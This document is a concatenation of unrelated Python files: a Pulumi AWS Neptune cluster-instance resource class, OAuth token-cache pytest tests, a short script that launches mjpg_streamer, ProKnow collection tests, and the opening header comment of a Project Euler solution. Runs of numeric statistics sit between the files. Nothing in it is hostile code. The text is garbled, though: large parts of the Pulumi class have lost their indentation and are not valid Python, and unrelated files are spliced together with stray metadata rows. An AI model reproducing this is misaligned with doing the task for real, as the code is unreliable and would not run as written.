Syntax: "ddd:hh24:mi-ddd:hh24:mi". Eg: "Mon:00:00-Mon:03:00".
:param pulumi.Input[int] promotion_tier: Default 0. Failover Priority setting on instance level. The reader who has lower tier has higher priority to get promoter to writer.
:param pulumi.Input[bool] publicly_accessible: Bool to control if instance is publicly accessible. Default is `false`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the instance.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ClusterInstanceArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A Cluster Instance Resource defines attributes that are specific to a single instance in a Neptune Cluster.
You can simply add neptune instances and Neptune manages the replication. You can use the [count](https://www.terraform.io/docs/configuration/meta-arguments/count.html)
meta-parameter to make multiple instances and join them all to the same Neptune Cluster, or you may specify different Cluster Instance resources with various `instance_class` sizes.
## Example Usage
The following example will create a neptune cluster with two neptune instances(one writer and one reader).
```python
import pulumi
import pulumi_aws as aws
default = aws.neptune.Cluster("default",
cluster_identifier="neptune-cluster-demo",
engine="neptune",
backup_retention_period=5,
preferred_backup_window="07:00-09:00",
skip_final_snapshot=True,
iam_database_authentication_enabled=True,
apply_immediately=True)
example = []
for range in [{"value": i} for i in range(0, 2)]:
example.append(aws.neptune.ClusterInstance(f"example-{range['value']}",
cluster_identifier=default.id,
engine="neptune",
instance_class="db.r4.large",
apply_immediately=True))
```
## Import
`aws_neptune_cluster_instance` can be imported by using the instance identifier, e.g.
```sh
$ pulumi import aws:neptune/clusterInstance:ClusterInstance example my-instance
```
:param str resource_name: The name of the resource.
:param ClusterInstanceArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ClusterInstanceArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 apply_immediately: Optional[pulumi.Input[bool]] = None,
                 auto_minor_version_upgrade: Optional[pulumi.Input[bool]] = None,
                 availability_zone: Optional[pulumi.Input[str]] = None,
                 cluster_identifier: Optional[pulumi.Input[str]] = None,
                 engine: Optional[pulumi.Input[str]] = None,
                 engine_version: Optional[pulumi.Input[str]] = None,
                 identifier: Optional[pulumi.Input[str]] = None,
                 identifier_prefix: Optional[pulumi.Input[str]] = None,
                 instance_class: Optional[pulumi.Input[str]] = None,
                 neptune_parameter_group_name: Optional[pulumi.Input[str]] = None,
                 neptune_subnet_group_name: Optional[pulumi.Input[str]] = None,
                 port: Optional[pulumi.Input[int]] = None,
                 preferred_backup_window: Optional[pulumi.Input[str]] = None,
                 preferred_maintenance_window: Optional[pulumi.Input[str]] = None,
                 promotion_tier: Optional[pulumi.Input[int]] = None,
                 publicly_accessible: Optional[pulumi.Input[bool]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 __props__=None):
        """Shared implementation behind both ``__init__`` overloads: validates
        options, builds the property bag, and registers the resource."""
        # Normalize and validate the resource options before use.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            # Pin the provider plugin version when the caller did not choose one.
            opts.version = _utilities.get_version()
        if opts.id is None:
            # No id means we are creating a new resource; __props__ is reserved
            # for the get() path that rehydrates an existing one.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = ClusterInstanceArgs.__new__(ClusterInstanceArgs)
            __props__.__dict__["apply_immediately"] = apply_immediately
            __props__.__dict__["auto_minor_version_upgrade"] = auto_minor_version_upgrade
            __props__.__dict__["availability_zone"] = availability_zone
            # cluster_identifier is required unless resolving via an existing URN.
            if cluster_identifier is None and not opts.urn:
                raise TypeError("Missing required property 'cluster_identifier'")
            __props__.__dict__["cluster_identifier"] = cluster_identifier
            __props__.__dict__["engine"] = engine
            __props__.__dict__["engine_version"] = engine_version
            __props__.__dict__["identifier"] = identifier
            __props__.__dict__["identifier_prefix"] = identifier_prefix
            # instance_class is required unless resolving via an existing URN.
            if instance_class is None and not opts.urn:
                raise TypeError("Missing required property 'instance_class'")
            __props__.__dict__["instance_class"] = instance_class
            __props__.__dict__["neptune_parameter_group_name"] = neptune_parameter_group_name
            __props__.__dict__["neptune_subnet_group_name"] = neptune_subnet_group_name
            __props__.__dict__["port"] = port
            __props__.__dict__["preferred_backup_window"] = preferred_backup_window
            __props__.__dict__["preferred_maintenance_window"] = preferred_maintenance_window
            __props__.__dict__["promotion_tier"] = promotion_tier
            __props__.__dict__["publicly_accessible"] = publicly_accessible
            __props__.__dict__["tags"] = tags
            # Output-only attributes: populated by the provider after creation.
            __props__.__dict__["address"] = None
            __props__.__dict__["arn"] = None
            __props__.__dict__["dbi_resource_id"] = None
            __props__.__dict__["endpoint"] = None
            __props__.__dict__["kms_key_arn"] = None
            __props__.__dict__["storage_encrypted"] = None
            __props__.__dict__["writer"] = None
        super(ClusterInstance, __self__).__init__(
            'aws:neptune/clusterInstance:ClusterInstance',
            resource_name,
            __props__,
            opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
address: Optional[pulumi.Input[str]] = None,
apply_immediately: Optional[pulumi.Input[bool]] = None,
arn: Optional[pulumi.Input[str]] = None,
auto_minor_version_upgrade: Optional[pulumi.Input[bool]] = None,
availability_zone: Optional[pulumi.Input[str]] = None,
cluster_identifier: Optional[pulumi.Input[str]] = None,
dbi_resource_id: Optional[pulumi.Input[str]] = None,
endpoint: Optional[pulumi.Input[str]] = None,
engine: Optional[pulumi.Input[str]] = None,
engine_version: Optional[pulumi.Input[str]] = None,
identifier: Optional[pulumi.Input[str]] = None,
identifier_prefix: Optional[pulumi.Input[str]] = None,
instance_class: Optional[pulumi.Input[str]] = None,
kms_key_arn: Optional[pulumi.Input[str]] = None,
neptune_parameter_group_name: Optional[pulumi.Input[str]] = None,
neptune_subnet_group_name: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
preferred_backup_window: Optional[pulumi.Input[str]] = None,
preferred_maintenance_window: Optional[pulumi.Input[str]] = None,
promotion_tier: Optional[pulumi.Input[int]] = None,
publicly_accessible: Optional[pulumi.Input[bool]] = None,
storage_encrypted: Optional[pulumi.Input[bool]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
writer: Optional[pulumi.Input[bool]] = None) -> 'ClusterInstance':
"""
Get an existing ClusterInstance resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] address: The hostname of the instance. See also `endpoint` and `port`.
:param pulumi.Input[bool] apply_immediately: Specifies whether any instance modifications
are applied immediately, or during the next maintenance window. Default is`false`.
:param pulumi.Input[str] arn: Amazon Resource Name (ARN) of neptune instance
:param pulumi.Input[bool] auto_minor_version_upgrade: Indicates that minor engine upgrades will be applied automatically to the instance during the maintenance window. Default is `true`.
:param pulumi.Input[str] availability_zone: The EC2 Availability Zone that the neptune instance is created in.
:param pulumi.Input[str] cluster_identifier: The identifier of the `neptune.Cluster` in which to launch this instance.
:param pulumi.Input[str] dbi_resource_id: The region-unique, immutable identifier for the neptune instance.
:param pulumi.Input[str] endpoint: The connection endpoint in `address:port` format.
:param pulumi.Input[str] engine: The name of the database engine to be used for the neptune instance. Defaults to `neptune`. Valid Values: `neptune`.
:param pulumi.Input[str] engine_version: The neptune engine version.
:param pulumi.Input[str] identifier: The identifier for the neptune instance, if omitted, this provider will assign a random, unique identifier.
:param pulumi.Input[str] identifier_prefix: Creates a unique identifier beginning with the specified prefix. Conflicts with `identifier`.
:param pulumi.Input[str] instance_class: The instance class to use.
:param pulumi.Input[str] kms_key_arn: The ARN for the KMS encryption key if one is set to the neptune cluster.
:param pulumi.Input[str] neptune_parameter_group_name: The name of the neptune parameter group to associate with this instance.
:param pulumi.Input[str] neptune_subnet_group_name: A subnet group to associate with this neptune instance. **NOTE:** This must match the `neptune_subnet_group_name` of the attached `neptune.Cluster`.
:param pulumi.Input[int] port: The port on which the DB accepts connections. Defaults to `8182`.
:param pulumi.Input[str] preferred_backup_window: The daily time range during which automated backups are created if automated backups are enabled. Eg: "04:00-09:00"
:param pulumi.Input[str] preferred_maintenance_window: The window to perform maintenance in.
Syntax: "ddd:hh24:mi-ddd:hh24:mi". Eg: "Mon:00:00-Mon:03:00".
:param pulumi.Input[int] promotion_tier: Default 0. Failover Priority setting on instance level. The reader who has lower tier has higher priority to get promoter to writer.
:param pulumi.Input[bool] publicly_accessible: Bool to control if instance is publicly accessible. Default is `false`.
:param pulumi.Input[bool] storage_encrypted: Specifies whether the neptune cluster is encrypted.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the instance.
:param pulumi.Input[bool] writer: Boolean indicating if this instance is writable. `False` indicates this instance is a read replica.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ClusterInstanceState.__new__(_ClusterInstanceState)
__props__.__dict__["address"] = address
__props__.__dict__["apply_immediately"] = apply_immediately
__props__.__dict__["arn"] = arn
__props__.__dict__["auto_minor_version_upgrade"] = auto_minor_version_upgrade
__props__.__dict__["availability_zone"] = availability_zone
__props__.__dict__["cluster_identifier"] = cluster_identifier
__props__.__dict__["dbi_resource_id"] = dbi_resource_id
__props__.__dict__["endpoint"] = endpoint
__props__.__dict__["engine"] = engine
__props__.__dict__["engine_version"] = engine_version
__props__.__dict__["identifier"] = identifier
__props__.__dict__["identifier_prefix"] = identifier_prefix
__props__.__dict__["instance_class"] = instance_class
__props__.__dict__["kms_key_arn"] = kms_key_arn
__props__.__dict__["neptune_parameter_group_name"] = neptune_parameter_group_name
__props__.__dict__["neptune_subnet_group_name"] = neptune_subnet_group_name
__props__.__dict__["port"] = port
__props__.__dict__["preferred_backup_window"] = preferred_backup_window
__props__.__dict__["preferred_maintenance_window"] = preferred_maintenance_window
__props__.__dict__["promotion_tier"] = promotion_tier
__props__.__dict__["publicly_accessible"] = publicly_accessible
__props__.__dict__["storage_encrypted"] = storage_encrypted
__props__.__dict__["tags"] = tags
__props__.__dict__["writer"] = writer
return ClusterInstance(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def address(self) -> pulumi.Output[str]:
"""
The hostname of the instance. See also `endpoint` and `port`.
"""
return pulumi.get(self, "address")
    @property
    @pulumi.getter(name="applyImmediately")
    def apply_immediately(self) -> pulumi.Output[bool]:
        """
        Specifies whether any instance modifications
        are applied immediately, or during the next maintenance window. Default is `false`.
        """
        return pulumi.get(self, "apply_immediately")
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
Amazon Resource Name (ARN) of neptune instance
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="autoMinorVersionUpgrade")
def auto_minor_version_upgrade(self) -> pulumi.Output[Optional[bool]]:
"""
Indicates that minor engine upgrades will be applied automatically to the instance during the maintenance window. Default is `true`.
"""
return pulumi.get(self, "auto_minor_version_upgrade")
@property
@pulumi.getter(name="availabilityZone")
def availability_zone(self) -> pulumi.Output[str]:
"""
The EC2 Availability Zone that the neptune instance is created in.
"""
return pulumi.get(self, "availability_zone")
@property
@pulumi.getter(name="clusterIdentifier")
def cluster_identifier(self) -> pulumi.Output[str]:
"""
The identifier of the `neptune.Cluster` in which to launch this instance.
"""
return pulumi.get(self, "cluster_identifier")
@property
@pulumi.getter(name="dbiResourceId")
def dbi_resource_id(self) -> pulumi.Output[str]:
"""
The region-unique, immutable identifier for the neptune instance.
"""
return pulumi.get(self, "dbi_resource_id")
@property
@pulumi.getter
def endpoint(self) -> pulumi.Output[str]:
"""
The connection endpoint in `address:port` format.
"""
return pulumi.get(self, "endpoint")
@property
@pulumi.getter
def engine(self) -> pulumi.Output[Optional[str]]:
"""
The name of the database engine to be used for the neptune instance. Defaults to `neptune`. Valid Values: `neptune`.
"""
return pulumi.get(self, "engine")
@property
@pulumi.getter(name="engineVersion")
def engine_version(self) -> pulumi.Output[str]:
"""
The neptune engine version.
"""
return pulumi.get(self, "engine_version")
@property
@pulumi.getter
def identifier(self) -> pulumi.Output[str]:
"""
The identifier for the neptune instance, if omitted, this provider will assign a random, unique identifier.
"""
return pulumi.get(self, "identifier")
@property
@pulumi.getter(name="identifierPrefix")
def identifier_prefix(self) -> pulumi.Output[str]:
"""
Creates a unique identifier beginning with the specified prefix. Conflicts with `identifier`.
"""
return pulumi.get(self, "identifier_prefix")
@property
@pulumi.getter(name="instanceClass")
def instance_class(self) -> pulumi.Output[str]:
"""
The instance class to use.
"""
return pulumi.get(self, "instance_class")
@property
@pulumi.getter(name="kmsKeyArn")
def kms_key_arn(self) -> pulumi.Output[str]:
"""
The ARN for the KMS encryption key if one is set to the neptune cluster.
"""
return pulumi.get(self, "kms_key_arn")
@property
@pulumi.getter(name="neptuneParameterGroupName")
def neptune_parameter_group_name(self) -> pulumi.Output[Optional[str]]:
"""
The name of the neptune parameter group to associate with this instance.
"""
return pulumi.get(self, "neptune_parameter_group_name")
@property
@pulumi.getter(name="neptuneSubnetGroupName")
def neptune_subnet_group_name(self) -> pulumi.Output[str]:
"""
A subnet group to associate with this neptune instance. **NOTE:** This must match the `neptune_subnet_group_name` of the attached `neptune.Cluster`.
"""
return pulumi.get(self, "neptune_subnet_group_name")
@property
@pulumi.getter
def port(self) -> pulumi.Output[Optional[int]]:
"""
The port on which the DB accepts connections. Defaults to `8182`.
"""
return pulumi.get(self, "port")
@property
@pulumi.getter(name="preferredBackupWindow")
def preferred_backup_window(self) -> pulumi.Output[str]:
"""
The daily time range during which automated backups are created if automated backups are enabled. Eg: "04:00-09:00"
"""
return pulumi.get(self, "preferred_backup_window")
@property
@pulumi.getter(name="preferredMaintenanceWindow")
def preferred_maintenance_window(self) -> pulumi.Output[str]:
"""
The window to perform maintenance in.
Syntax: "ddd:hh24:mi-ddd:hh24:mi". Eg: "Mon:00:00-Mon:03:00".
"""
return pulumi.get(self, "preferred_maintenance_window")
    @property
    @pulumi.getter(name="promotionTier")
    def promotion_tier(self) -> pulumi.Output[Optional[int]]:
        """
        Default 0. Failover Priority setting on instance level. The reader with the lower tier has higher priority to get promoted to writer.
        """
        return pulumi.get(self, "promotion_tier")
@property
@pulumi.getter(name="publiclyAccessible")
def publicly_accessible(self) -> pulumi.Output[Optional[bool]]:
"""
Bool to control if instance is publicly accessible. Default is `false`.
"""
return pulumi.get(self, "publicly_accessible")
@property
@pulumi.getter(name="storageEncrypted")
def storage_encrypted(self) -> pulumi.Output[bool]:
"""
Specifies whether the neptune cluster is encrypted.
"""
return pulumi.get(self, "storage_encrypted")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A map of tags to assign to the instance.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def writer(self) -> pulumi.Output[bool]:
"""
Boolean indicating if this instance is writable. `False` indicates this instance is a read replica.
"""
return pulumi.get(self, "writer")
| 48.657939
| 208
| 0.67107
| 6,832
| 57,611
| 5.44072
| 0.046253
| 0.08286
| 0.070808
| 0.06688
| 0.940464
| 0.926771
| 0.905948
| 0.896505
| 0.883807
| 0.86242
| 0
| 0.004665
| 0.22973
| 57,611
| 1,183
| 209
| 48.69907
| 0.832973
| 0.345889
| 0
| 0.794337
| 1
| 0
| 0.117532
| 0.044966
| 0
| 0
| 0
| 0
| 0
| 1
| 0.168405
| false
| 0.00149
| 0.007452
| 0
| 0.278689
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4d157768f7b1be01c6f96b3cad2b6b848a827cf3
| 4,453
|
py
|
Python
|
test/oauth_token_cache_mechanism_test.py
|
delving-co/oauth-token-cache
|
6dcc016a736fd6a99470d0400ee6d9048b7dda82
|
[
"MIT"
] | 2
|
2019-10-27T07:39:36.000Z
|
2019-10-27T08:45:58.000Z
|
test/oauth_token_cache_mechanism_test.py
|
delving-co/oauth-token-cache
|
6dcc016a736fd6a99470d0400ee6d9048b7dda82
|
[
"MIT"
] | 7
|
2019-10-28T21:00:57.000Z
|
2020-09-22T11:10:11.000Z
|
test/oauth_token_cache_mechanism_test.py
|
delving-co/oauth-token-cache
|
6dcc016a736fd6a99470d0400ee6d9048b7dda82
|
[
"MIT"
] | 2
|
2020-02-20T09:51:43.000Z
|
2022-03-04T05:06:32.000Z
|
"""Test OAuthTokenCache.token() caching behaviour."""
import pytest
from unittest import mock
from oauth_token_cache import TokenClient
@mock.patch.object(TokenClient, "cached_token")
@mock.patch.object(TokenClient, "fresh_token")
def test_existing_local_token(
    mock_fresh_token,
    mock_cached_token,
    oauth_token_cache_instance,
    audience,
    make_token,
):
    """A valid token already sits in the local cache: it must be returned
    without consulting the redis cache or issuing a fresh token."""
    local_token = make_token()
    mock_fresh_token.return_value = local_token

    # Seed the in-process cache directly.
    oauth_token_cache_instance.tokens[audience] = local_token

    assert oauth_token_cache_instance.token(audience=audience) == local_token
    mock_cached_token.assert_not_called()
    mock_fresh_token.assert_not_called()
@mock.patch.object(TokenClient, "cached_token")
@mock.patch.object(TokenClient, "fresh_token")
def test_expired_local_token(
    mock_fresh_token,
    mock_cached_token,
    oauth_token_cache_instance,
    audience,
    make_token,
):
    """An expired token in the local cache and nothing in redis: both caches
    are checked, then a brand-new token is issued."""
    fresh = make_token()
    stale = make_token(expires_at=-1)

    mock_cached_token.return_value = None
    mock_fresh_token.return_value = fresh

    # Seed the in-process cache with the already-expired token.
    oauth_token_cache_instance.tokens[audience] = stale

    assert oauth_token_cache_instance.token(audience=audience) == fresh
    mock_cached_token.assert_called_once()
    mock_fresh_token.assert_called_once()
@mock.patch.object(TokenClient, "cached_token")
@mock.patch.object(TokenClient, "fresh_token")
def test_redis_cache_hit(
    mock_fresh_token,
    mock_cached_token,
    oauth_token_cache_instance,
    audience,
    make_token,
):
    """Nothing in the local cache but a token in redis: the redis token is
    returned without issuing a fresh one.
    """
    cached = make_token()
    mock_cached_token.return_value = cached

    assert oauth_token_cache_instance.token(audience=audience) == cached
    mock_cached_token.assert_called_once()
    mock_fresh_token.assert_not_called()
@mock.patch.object(TokenClient, "cached_token")
@mock.patch.object(TokenClient, "fresh_token")
def test_multiple_redis_cache_hits(
    mock_fresh_token,
    mock_cached_token,
    oauth_token_cache_instance,
    audience,
    make_token,
):
    """Nothing in the local cache but a token in redis: repeated lookups
    keep returning that token while hitting redis only once (subsequent
    calls are served from the local cache) and never issue a fresh token.
    """
    cached = make_token()
    mock_cached_token.return_value = cached

    for _ in range(3):
        assert oauth_token_cache_instance.token(audience=audience) == cached

    mock_cached_token.assert_called_once()
    mock_fresh_token.assert_not_called()
@mock.patch.object(TokenClient, "cached_token")
@mock.patch.object(TokenClient, "fresh_token")
def test_multiple_redis_cache_misses(
    mock_fresh_token,
    mock_cached_token,
    oauth_token_cache_instance,
    audience,
    make_token,
):
    """Neither cache holds a token: a fresh token is issued exactly once,
    after checking both caches exactly once, even across repeated lookups.
    """
    fresh = make_token()
    mock_cached_token.return_value = None
    mock_fresh_token.return_value = fresh

    for _ in range(3):
        assert oauth_token_cache_instance.token(audience=audience) == fresh

    mock_cached_token.assert_called_once()
    mock_fresh_token.assert_called_once()
@mock.patch.object(TokenClient, "cached_token")
@mock.patch.object(TokenClient, "fresh_token")
def test_multiple_audiences(
    mock_fresh_token,
    mock_cached_token,
    oauth_token_cache_instance,
    audience,
    make_token,
):
    """Tokens for two different audiences are cached independently: each
    audience hits redis once, is then served locally, and no fresh token
    is ever issued.
    """
    tokens = {
        "first": make_token(access_token="first"),
        "second": make_token(access_token="second"),
    }

    # Warm the cache for each audience; only the first lookup per audience
    # should reach redis.
    for name, expected in tokens.items():
        mock_cached_token.return_value = expected
        for _ in range(3):
            assert oauth_token_cache_instance.token(audience=name) == expected

    # With redis now returning nothing, both audiences must still resolve
    # from the local cache.
    mock_cached_token.return_value = None
    for name, expected in tokens.items():
        assert oauth_token_cache_instance.token(audience=name) == expected

    mock_fresh_token.assert_not_called()
    assert mock_cached_token.call_count == 2
| 29.686667
| 111
| 0.751628
| 611
| 4,453
| 5.130933
| 0.11784
| 0.077512
| 0.090909
| 0.124721
| 0.873046
| 0.839553
| 0.821691
| 0.792345
| 0.792345
| 0.752791
| 0
| 0.001611
| 0.16371
| 4,453
| 149
| 112
| 29.885906
| 0.840226
| 0.159668
| 0
| 0.823529
| 0
| 0
| 0.046367
| 0
| 0
| 0
| 0
| 0
| 0.205882
| 1
| 0.058824
| false
| 0
| 0.029412
| 0
| 0.088235
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4d16583016bae02b06c3a545d2010854f5bf2157
| 179
|
py
|
Python
|
faceRequest/mjpgweb.py
|
gateaunet/facerecogapi
|
1f25ef9e1d0ef95c507410bae2268d146934985f
|
[
"Apache-2.0"
] | null | null | null |
faceRequest/mjpgweb.py
|
gateaunet/facerecogapi
|
1f25ef9e1d0ef95c507410bae2268d146934985f
|
[
"Apache-2.0"
] | null | null | null |
faceRequest/mjpgweb.py
|
gateaunet/facerecogapi
|
1f25ef9e1d0ef95c507410bae2268d146934985f
|
[
"Apache-2.0"
] | null | null | null |
import os
import sys
def onWebcam(port=8090, input_plugin="input_uvc.so",
             www_dir="/usr/local/share/mjpg-streamer/www/"):
    """Start mjpg-streamer serving the webcam as an MJPEG HTTP stream.

    Blocks until the `mjpg_streamer` process exits (os.system waits).

    Args:
        port: HTTP port for the output_http.so plugin (default 8090,
            matching the original hard-coded command).
        input_plugin: mjpg-streamer input plugin to load.
        www_dir: document root handed to the HTTP output plugin.

    Returns:
        The exit status reported by os.system.

    NOTE(review): this builds a shell command string; if any argument ever
    comes from untrusted input, switch to subprocess.run with a list and
    shell=False.
    """
    command = (
        'mjpg_streamer -i "%s" -o "output_http.so -p %d -w %s"'
        % (input_plugin, port, www_dir)
    )
    return os.system(command)  # start mjpgstreamer
| 17.9
| 136
| 0.703911
| 29
| 179
| 4.241379
| 0.827586
| 0.195122
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.026316
| 0.150838
| 179
| 9
| 137
| 19.888889
| 0.782895
| 0.100559
| 0
| 0
| 0
| 0.25
| 0.628205
| 0.230769
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
4d5858acc7df1ee7b69685d779b85f846c0db87e
| 5,665
|
py
|
Python
|
tests/collections/test_collection_patients.py
|
proknow/proknow-python
|
c4ca0be6f606db655b711d3490febdec9c139570
|
[
"MIT"
] | 2
|
2019-03-16T21:41:45.000Z
|
2022-02-09T16:01:58.000Z
|
tests/collections/test_collection_patients.py
|
proknow/proknow-python
|
c4ca0be6f606db655b711d3490febdec9c139570
|
[
"MIT"
] | 7
|
2019-02-25T15:04:30.000Z
|
2021-12-13T15:15:38.000Z
|
tests/collections/test_collection_patients.py
|
proknow/proknow-python
|
c4ca0be6f606db655b711d3490febdec9c139570
|
[
"MIT"
] | 3
|
2020-07-10T14:18:55.000Z
|
2021-09-14T09:47:41.000Z
|
import pytest
import os
from proknow import Exceptions
def _assert_collection_empty(collection):
    """Assert that the collection currently reports no patients."""
    assert len(collection.patients.query()) == 0


def _assert_add_and_remove(collection, workspace_id, patient_summary, entity_summary):
    """Add one patient to the collection, verify the queried summary, then
    remove it and verify the collection is empty again.

    When entity_summary is None the patient is added without a
    representative entity, and the queried entity_id must be None.
    """
    item = {"patient": patient_summary.id}
    if entity_summary is not None:
        item["entity"] = entity_summary.id
    collection.patients.add(workspace_id, [item])

    patients = collection.patients.query()
    assert len(patients) == 1
    patient = patients[0]
    assert patient.id == patient_summary.id
    if entity_summary is not None:
        assert patient.entity_id == entity_summary.id
    else:
        assert patient.entity_id is None
    assert isinstance(patient.data, dict)

    # Removal only needs the patient id, regardless of how it was added.
    collection.patients.remove(workspace_id, [{"patient": patient_summary.id}])
    assert len(collection.patients.query()) == 0


def test_collection_patients(app, workspace_generator, collection_generator):
    """Exercise add/query/remove of collection patients — with and without a
    representative entity — for both workspace and organization collections.
    """
    pk = app.pk
    _, workspace = workspace_generator()
    batch = pk.uploads.upload(workspace.id, "./data/Becker^Matthew")
    path = os.path.abspath("./data/Becker^Matthew/HNC0522c0009_Plan1.dcm")
    patient_summary = batch.find_patient(path)
    entity_summary = batch.find_entity(path)

    # Same lifecycle is verified against a workspace collection and an
    # organization collection (the original duplicated this block 4x).
    for generator_kwargs in (
        {"type": "workspace", "workspaces": [workspace.id]},
        {"workspaces": [workspace.id]},
    ):
        _, collection = collection_generator(**generator_kwargs)
        _assert_collection_empty(collection)
        # Patient with a representative entity.
        _assert_add_and_remove(collection, workspace.id, patient_summary, entity_summary)
        # Patient without a representative entity.
        _assert_add_and_remove(collection, workspace.id, patient_summary, None)
def test_collection_patients_query(app, workspace_generator, collection_generator):
    """A freshly created collection, re-fetched by id, has no patients."""
    pk = app.pk
    _, workspace = workspace_generator()
    _, created = collection_generator(workspaces=[workspace.id])
    collection = pk.collections.find(workspace=workspace.id, id=created.id).get()
    assert len(collection.patients.query()) == 0
def test_collection_patients_failure(app, workspace_generator, collection_generator):
    """Both add and remove raise WorkspaceLookupError for an unknown
    workspace name, with the expected message.
    """
    pk = app.pk
    _, workspace = workspace_generator()
    _, collection = collection_generator(workspaces=[workspace.id])
    batch = pk.uploads.upload(workspace.id, "./data/Becker^Matthew")
    path = os.path.abspath("./data/Becker^Matthew/HNC0522c0009_Plan1.dcm")
    patient_summary = batch.find_patient(path)
    entity_summary = batch.find_entity(path)

    expected = 'Workspace with name `Does Not Exist` not found.'
    cases = [
        (collection.patients.add,
         {"patient": patient_summary.id, "entity": entity_summary.id}),
        (collection.patients.remove,
         {"patient": patient_summary.id}),
    ]
    for operation, payload in cases:
        with pytest.raises(Exceptions.WorkspaceLookupError) as err_wrapper:
            operation("Does Not Exist", [payload])
        assert err_wrapper.value.message == expected
def test_collection_patients_get(app, workspace_generator, collection_generator):
    """patients[0].get() returns the full record matching the upload summary."""
    pk = app.pk
    _, workspace = workspace_generator()
    _, collection = collection_generator(workspaces=[workspace.id])
    batch = pk.uploads.upload(workspace.id, "./data/Becker^Matthew")
    path = os.path.abspath("./data/Becker^Matthew/HNC0522c0009_Plan1.dcm")
    patient_summary = batch.find_patient(path)
    entity_summary = batch.find_entity(path)
    collection.patients.add(workspace.id, [{
        "patient": patient_summary.id,
        "entity": entity_summary.id,
    }])

    # Fetch the full patient record through the first (and only) query result.
    patient = collection.patients.query()[0].get()
    assert patient.id == patient_summary.id
    assert patient.mrn == patient_summary.data["mrn"]
    assert patient.name == patient_summary.data["name"]
| 36.082803
| 89
| 0.702383
| 648
| 5,665
| 6.010802
| 0.115741
| 0.124775
| 0.065725
| 0.095507
| 0.888575
| 0.888575
| 0.88113
| 0.871374
| 0.851091
| 0.851091
| 0
| 0.009368
| 0.189762
| 5,665
| 156
| 90
| 36.314103
| 0.839216
| 0.106443
| 0
| 0.880342
| 0
| 0
| 0.086009
| 0.038644
| 0
| 0
| 0
| 0
| 0.239316
| 1
| 0.034188
| false
| 0
| 0.025641
| 0
| 0.059829
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4dcd6e086423664e177ff924138ae01d10955388
| 1,388
|
py
|
Python
|
ProjectEuler/python/prob8.py
|
yuriyshapovalov/Prototypes
|
1fc4af4434440a8f59a4bcb486e79fd53d199a7d
|
[
"Apache-2.0"
] | null | null | null |
ProjectEuler/python/prob8.py
|
yuriyshapovalov/Prototypes
|
1fc4af4434440a8f59a4bcb486e79fd53d199a7d
|
[
"Apache-2.0"
] | 1
|
2015-03-25T22:35:52.000Z
|
2015-03-25T22:35:52.000Z
|
ProjectEuler/python/prob8.py
|
yuriyshapovalov/Prototypes
|
1fc4af4434440a8f59a4bcb486e79fd53d199a7d
|
[
"Apache-2.0"
] | null | null | null |
# projecteuler.net/problem=8
# The 1000-digit number from Project Euler problem 8, scanned below in
# windows of adjacent digits.
